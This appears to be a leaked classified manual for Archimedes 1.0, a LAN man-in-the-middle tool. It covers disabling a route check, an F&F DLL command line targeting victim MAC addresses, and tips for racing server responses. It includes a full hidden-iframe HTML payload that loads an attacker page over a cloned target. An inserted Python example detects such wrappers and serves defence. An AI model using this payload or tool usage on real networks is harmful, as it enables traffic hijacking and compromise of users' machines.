(S) Engineering Development Group
(S) UMBRAGE PROJECT
(S) Archimedes 1.0
(U) Tool Documentation
(U) Rev. 1.1
18-December-2012
SECRET//NOFORN
(S//NF) Archimedes 1.0 makes the following modifications to the Fulcrum tool:
1. Support disabling the route verification check that occurs prior to exploitation
2. Add support for a new HTTP injection method based on using a hidden IFRAME
3. Modify the DLLs to support the Fire and Forget specification (version 2)
4. Provide a method of gracefully shutting down the tool on demand
5. Remove the most alerting strings from the release binaries
FILE INFORMATION
(S) The following binaries are delivered in Archimedes 1.0.
(S//NF) Note that the delivery includes both debug and release builds of each binary. The debug builds contain additional instrumentation that can be helpful in pinpointing errors and unexpected behavior and will generate log information that can be used to trace the program's execution. Debug versions should not be deployed on a machine that we do not have physical control over: the additional information in them makes the software particularly vulnerable to reverse engineering and analysis. Debug versions of the tool should be used in controlled test environments only.
(U) NEW OPTIONS
(S) ROUTE VERIFICATION CHECK
(S//NF) Prior to performing an injection attack, the original tool performs a Routing Verification step that would often result in a handled error that caused the program to terminate. It is believed that the failure may be caused by network card incompatibility or the LAN infrastructure. An example of the error is shown below.
(S//NF) Archimedes adds the option to disable this check and continue with normal tool operation. Testing has shown that this can enable Archimedes to successfully perform the attack in environments where the tool would previously error and exit.
(S//NF) This new option is a required parameter in the configuration file and is provided as:
VERIFY_ROUTE=TRUE
or
VERIFY_ROUTE=FALSE
(S//NF) The value TRUE results in the original routing check being performed. The value FALSE disables the routing check.
(S) INJECTION METHOD
(S//NF) The INJECTION_METHOD is specified in the Archimedes configuration file. In addition to the methods supported by Fulcrum 0.6.1, Archimedes adds support for the HIDDEN_IFRAME option. This method will produce the following HTML:
<html>
<head>
<title></title>
<style type="text/css">
html, body
{
    overflow: hidden;
    margin: auto;
    height: 100%;
    width: 100%;
}
</style>
</head>
<body>
<iframe src="http://10.0.0.11/attack.html" frameborder="0" width="0" height="0">
</iframe>
<iframe src="http://10.0.0.11/?" frameborder="0" width="100%" height="100%"></iframe>
</body>
</html>
(S//NF) The attack URL will be replaced with that specified by the user and the second URL will redirect the client to the original target. The result is a web page that looks like the original target. It is possible to detect the modification by examining the page source.
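The document notes that the HIDDEN_IFRAME wrapper is visible in the page source. The following is an added detection example, not part of the original document or the tool: it parses a fetched page with the Python standard library and flags iframes that are zero-sized or point to a host other than the one the page was requested from, and separately recognises the overall wrapper pattern (empty title, one zero-size frame, one full-size frame). The sample HTML is constructed here from the structure shown above; the expected host "www.test.com" is taken from the troubleshooting section and is an assumption of the example.

```python
"""Detect a hidden-IFRAME wrapper page by inspecting HTML source (added example)."""
from html.parser import HTMLParser
from urllib.parse import urlparse


class IframeCollector(HTMLParser):
    """Records every <iframe> and the page <title> while parsing."""

    def __init__(self):
        super().__init__()
        self.iframes = []      # one dict per iframe: src, width, height
        self.title = ""
        self._in_title = False

    def handle_starttag(self, tag, attrs):
        if tag == "title":
            self._in_title = True
        elif tag == "iframe":
            a = dict(attrs)
            self.iframes.append({
                "src": a.get("src") or "",
                "width": a.get("width") or "",
                "height": a.get("height") or "",
            })

    def handle_endtag(self, tag):
        if tag == "title":
            self._in_title = False

    def handle_data(self, data):
        if self._in_title:
            self.title += data


def _is_zero(value):
    """True for size attributes such as '0', '0px' or '0%'."""
    return value.strip().lower().rstrip("px%") == "0"


def _is_full(value):
    """True for a size attribute of exactly 100%."""
    return value.strip() == "100%"


def find_suspicious_iframes(html, expected_host):
    """Return findings for iframes that are hidden or load from another host.

    expected_host is the hostname the page was requested from (supplied by the caller).
    """
    p = IframeCollector()
    p.feed(html)
    findings = []
    for fr in p.iframes:
        reasons = []
        if _is_zero(fr["width"]) or _is_zero(fr["height"]):
            reasons.append("zero-size")
        host = urlparse(fr["src"]).hostname
        if host and host != expected_host:
            reasons.append("off-host src %s" % host)
        if reasons:
            findings.append({"src": fr["src"], "reasons": reasons})
    return findings


def looks_like_iframe_wrapper(html):
    """True when the page matches the wrapper shape: empty title, a zero-size
    iframe and a full-size iframe (the pattern shown in the document)."""
    p = IframeCollector()
    p.feed(html)
    has_hidden = any(_is_zero(f["width"]) or _is_zero(f["height"]) for f in p.iframes)
    has_full = any(_is_full(f["width"]) and _is_full(f["height"]) for f in p.iframes)
    return p.title.strip() == "" and has_hidden and has_full


# Constructed samples: the first mirrors the wrapper structure above, the second is a normal page.
SAMPLE_INJECTED = """<html><head><title></title></head><body>
<iframe src="http://10.0.0.11/attack.html" frameborder="0" width="0" height="0"></iframe>
<iframe src="http://www.test.com/?" frameborder="0" width="100%" height="100%"></iframe>
</body></html>"""

SAMPLE_CLEAN = """<html><head><title>Test</title></head><body><p>Hello</p>
<iframe src="http://www.test.com/widget" width="300" height="250"></iframe>
</body></html>"""

if __name__ == "__main__":
    for name, page in (("injected", SAMPLE_INJECTED), ("clean", SAMPLE_CLEAN)):
        print(name, find_suspicious_iframes(page, "www.test.com"),
              "wrapper" if looks_like_iframe_wrapper(page) else "ok")
```

Running a check like this against pages fetched from a monitored client position, and comparing the result with a fetch made from a different network path, is one way to notice that the LAN-side response differs from what the origin server sends.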
(C) FIRE AND FORGET SUPPORT
(S//NF) The Archimedes DLL (f32.dll or f64.dll) and Archimedes Shutdown DLL (fs32.dll, fs64.dll) have been modified to support the Fire and Forget (F&F) specification (version 2). In addition to the API changes, this requires a new way of locating the configuration file and defining a location for log files and temporary files created by the program.
(S//NF) The F&F DLL uses the temporary folder associated with the injection target as a location for these files. This folder can be identified as the TEMP environment variable.
(S//NF) The F&F specification provides for argument passing. Archimedes adds two optional arguments that can be used to control the behavior of the tool in F&F mode. These arguments define the values to be used for VERIFY_ROUTE and INJECTION_METHOD. Note that if the INJECTION_METHOD is specified, then it must be preceded by the VERIFY_ROUTE option. The following is an example command line for the F&F DLL:
[VICTIM MAC] [HIJACK MAC] [MILLISECONDS] [URL] [VERIFY_ROUTE] [INJECTION_METHOD]
(S//NF) VERIFY_ROUTE is (TRUE or FALSE) and INJECTION_METHOD is (HIDDEN_IFRAME or DOUBLE_FRAME or META_REFRESH). The VERIFY_ROUTE parameter can be specified without the INJECTION_METHOD.
(S//NF) The Archimedes DLL returns the appropriate error code to indicate that it should not be unloaded from memory by the calling process. The DLL will unload after performing a successful attack against the target. The log file can be used to trace the behavior of the Archimedes program.
(S//NF) The Archimedes Shutdown DLL signals the running instance of Archimedes to gracefully shut down. It can be run as an F&F DLL and returns an error code indicating that the calling process can unload it.
(U) APPLICATION DEFAULTS
(S//NF) The modifications introduced with Archimedes 1.0 add new capabilities, but do not change the default behavior of the original tool.
(U) TROUBLESHOOTING
(S//NF) Archimedes and Fulcrum only inject into HTTP requests that reference the root of the document directory. For example, http://www.test.com/ but not http://www.test.com/subdir/index.html.
(S//NF) Archimedes relies on its response packet beating the response packet from the HTTP server. In LAN testing environments, this is difficult to achieve without artificially introducing latency between the victim and the HTTP server.
(S//NF) If the victim's MAC address is not in the pivot's cache, it will scan for the victim machine before performing the injection. This can take several minutes (or can be eliminated by pinging the victim).